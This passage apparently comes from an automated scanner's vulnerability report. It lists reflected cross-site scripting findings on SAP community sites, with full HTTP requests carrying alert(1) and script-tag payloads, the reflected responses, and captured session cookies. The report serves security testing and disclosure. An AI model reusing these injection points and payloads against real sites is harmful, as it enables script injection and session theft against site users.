CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
Content-Type: text/html; charset=UTF-8
x-jal: 1187
JP: D=1249159 t=1321213474149191
Content-Length: 233935
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:44:35 GMT
Connection: keep-alive
Set-Cookie: jive.recentHistory.-1=31342c393132373b; Expires=Tue, 13-Dec-2011 19:44:35 GMT; Path=/cw

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
("The link URL is missing, Please check that the required system properties are set!.");
}else{
window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/community/ideas?dbedd'-alert(1)-'400de4f3298=1');
}
}

function submitIdea(containerID) {

if(containerID == null ){
alert("Cannot create an idea right now");
}else{
window.location.href = '/cw/create-idea!in
...[SNIP]...

1.4. https://cw.sdn.sap.com/cw/ideas/6794 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cw.sdn.sap.com
Path:   /cw/ideas/6794

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5114f'-alert(1)-'4929ad66ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cw/ideas5114f'-alert(1)-'4929ad66ff5/6794 HTTP/1.1
Host: cw.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cw.sdn.sap.com/cw/community/ideas?dbedd%27-alert(1)-%27400de4f3298=1
Cookie: jive.recentHistory.-1=31342c393132373b; SDNSTATE_CW=3546550444.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
Content-Type: text/html; charset=UTF-8
x-jal: 225
JP: D=285044 t=1321226055479961
Content-Length: 188941
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:14:15 GMT
Connection: keep-alive
Set-Cookie: jive.recentHistory.-1=333232373338332c363739343b31342c393132373b; Expires=Tue, 13-Dec-2011 23:14:15 GMT; Path=/cw

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
ert("The link URL is missing, Please check that the required system properties are set!.");
}else{
window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/ideas5114f'-alert(1)-'4929ad66ff5/6794');
}
}
function scnLogOffRedirect(url, jiveURL) {
if(url == null){
alert("The link URL is missing, Please check that the required system pr
...[SNIP]...

1.5. https://cw.sdn.sap.com/cw/ideas/6794 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cw.sdn.sap.com
Path:   /cw/ideas/6794

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e1c1'-alert(1)-'28c731b3c96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cw/ideas/67945e1c1'-alert(1)-'28c731b3c96 HTTP/1.1
Host: cw.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cw.sdn.sap.com/cw/community/ideas?dbedd%27-alert(1)-%27400de4f3298=1
Cookie: jive.recentHistory.-1=31342c393132373b; SDNSTATE_CW=3546550444.14340.0000

Response

HTTP/1.1 404 Not Found
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
Content-Type: text/html; charset=UTF-8
x-jal: 19
sap-isc-etag: J2EE/cw
JP: D=38142 t=1321226062850345
Content-Length: 16304
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:14:22 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
rt = location.port;
               var res = protocol + "//" + host;
               try {
                   if(port.length() > 0);
                   res = res + port;
               }catch(err){
               }
               window.location.href = url + escape(res + '/ideas/67945e1c1'-alert(1)-'28c731b3c96');
           }
       }

       function scnLogOffRedirect(url, jiveURL) {
           if(url == null){
               alert("The link URL is missing, Please check that the required system properties are set!.");
           }else{
               window.loc
...[SNIP]...

1.6. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cw.sdn.sap.com
Path:   /cw/ideas/6794

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80da3'-alert(1)-'1e2e99731f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cw/ideas/6794?80da3'-alert(1)-'1e2e99731f5=1 HTTP/1.1
Host: cw.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cw.sdn.sap.com/cw/community/ideas?dbedd%27-alert(1)-%27400de4f3298=1
Cookie: jive.recentHistory.-1=31342c393132373b; SDNSTATE_CW=3546550444.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
Content-Type: text/html; charset=UTF-8
x-jal: 235
JP: D=297680 t=1321226028512220
Content-Length: 188950
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:13:48 GMT
Connection: keep-alive
Set-Cookie: jive.recentHistory.-1=333232373338332c363739343b31342c393132373b; Expires=Tue, 13-Dec-2011 23:13:48 GMT; Path=/cw

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
he link URL is missing, Please check that the required system properties are set!.");
}else{
window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/ideas/6794?80da3'-alert(1)-'1e2e99731f5=1');
}
}
function scnLogOffRedirect(url, jiveURL) {
if(url == null){
alert("The link URL is missing, Please check that the required system prope
...[SNIP]...

1.7. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cw.sdn.sap.com
Path:   /cw/ideas/6794

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e9d"><script>alert(1)</script>277a2c9c500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cw/ideas/6794?d0e9d"><script>alert(1)</script>277a2c9c500=1 HTTP/1.1
Host: cw.sdn.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cw.sdn.sap.com/cw/community/ideas?dbedd%27-alert(1)-%27400de4f3298=1
Cookie: jive.recentHistory.-1=31342c393132373b; SDNSTATE_CW=3546550444.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
Content-Type: text/html; charset=UTF-8
x-jal: 230
JP: D=288901 t=1321226020712846
Content-Length: 189035
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:13:41 GMT
Connection: keep-alive
Set-Cookie: jive.recentHistory.-1=333232373338332c363739343b31342c393132373b; Expires=Tue, 13-Dec-2011 23:13:40 GMT; Path=/cw

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<input type="hidden" name="redirectUrl" value="/cw/ideas/6794?d0e9d"><script>alert(1)</script>277a2c9c500=1" />
...[SNIP]...

1.8. http://forums.sdn.sap.com/message.jspa [messageID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /message.jspa

Issue detail

The value of the messageID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87246</script><a>5d291e2a5c was submitted in the messageID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /message.jspa?messageID=789391587246</script><a>5d291e2a5c HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/thread.jspa?threadID=1414217
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE4806200)4806250; JSESSIONID=(J2EE4806200)ID0839353050DB02501609907619194126End; SDNSTATE_FRM=2539917484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213539|session#1321213478215-608827#1321215339; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215281611%3B%20pe%3Devent13%7C1321215281615%3B%20c3%3Dno%2520value%7C1321215281619%3B%20s_nr%3D1321213481624-Returning%7C1323805481624%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813481627%3B%20s_visit%3D1%7C1321215281629%3B%20gpv_p47%3Dno%2520value%7C1321215281632%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/message.jspa%2525253FmessageID%2525253D7893915%252525237893915%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTctMTMzOUU3NkU2MzMtQjg5NTExMzA5NzdBNEJCQw==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8715
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:45:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...
s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/message.jspa?messageID=789391587246</script><a>5d291e2a5c";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.9. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /message.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c90"><a>b5d8cd961e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /message.jspa?messageID=7893915&64c90"><a>b5d8cd961e9=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/thread.jspa?threadID=1414217
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE4806200)4806250; JSESSIONID=(J2EE4806200)ID0839353050DB02501609907619194126End; SDNSTATE_FRM=2539917484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213539|session#1321213478215-608827#1321215339; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215281611%3B%20pe%3Devent13%7C1321215281615%3B%20c3%3Dno%2520value%7C1321215281619%3B%20s_nr%3D1321213481624-Returning%7C1323805481624%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813481627%3B%20s_visit%3D1%7C1321215281629%3B%20gpv_p47%3Dno%2520value%7C1321215281632%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/message.jspa%2525253FmessageID%2525253D7893915%252525237893915%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTctMTMzOUU3NzVFODAtNTdCMjRGQkQ3MDAxNUZEOA==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 45
SDN_CATEGORY: 3
SDN_THREAD: 1414217
SDN_MESSAGE: 7893915
Content-Length: 36649
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:46:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAML co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?messageID=7893915&amp;64c90"><a>b5d8cd961e9=1" />
...[SNIP]...

1.10. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /message.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68510</script><a>c216dce91af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /message.jspa?messageID=7893915&68510</script><a>c216dce91af=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/thread.jspa?threadID=1414217
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE4806200)4806250; JSESSIONID=(J2EE4806200)ID0839353050DB02501609907619194126End; SDNSTATE_FRM=2539917484.14340.0000; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213539|session#1321213478215-608827#1321215339; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215281611%3B%20pe%3Devent13%7C1321215281615%3B%20c3%3Dno%2520value%7C1321215281619%3B%20s_nr%3D1321213481624-Returning%7C1323805481624%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813481627%3B%20s_visit%3D1%7C1321215281629%3B%20gpv_p47%3Dno%2520value%7C1321215281632%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/message.jspa%2525253FmessageID%2525253D7893915%252525237893915%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTctMTMzOUU3OEIzOUYtQzUwMzA1OUI0RjgxMTFDQw==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 45
SDN_CATEGORY: 3
SDN_THREAD: 1414217
SDN_MESSAGE: 7893915
Content-Length: 36821
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:47:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAML co
...[SNIP]...
.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/message.jspa?messageID=7893915&68510</script><a>c216dce91af=1";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.11. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6382"><a>e34da4ea807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /thread.jspa?threadID=2072047&a6382"><a>e34da4ea807=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEAQFjAD&url=http%3A%2F%2Fforums.sdn.sap.com%2Fthread.jspa%3FthreadID%3D2072047&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNEl9qnvLkGujrH2Uevfr_w1i_a6oQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums400.sdn.sap.com%2fthread.jspa%3fthreadID%3d480818; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215159759%3B%20pe%3Dno%2520value%7C1321215159763%3B%20c3%3Dno%2520value%7C1321215159767%3B%20s_nr%3D1321213359777-Returning%7C1323805359777%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813359780%3B%20s_visit%3D1%7C1321215159782%3B%20gpv_p47%3Dno%2520value%7C1321215159787%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTctMTMzOUU3NTNFREMtNThCRkNDNzNFQjFDRUEwOA==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
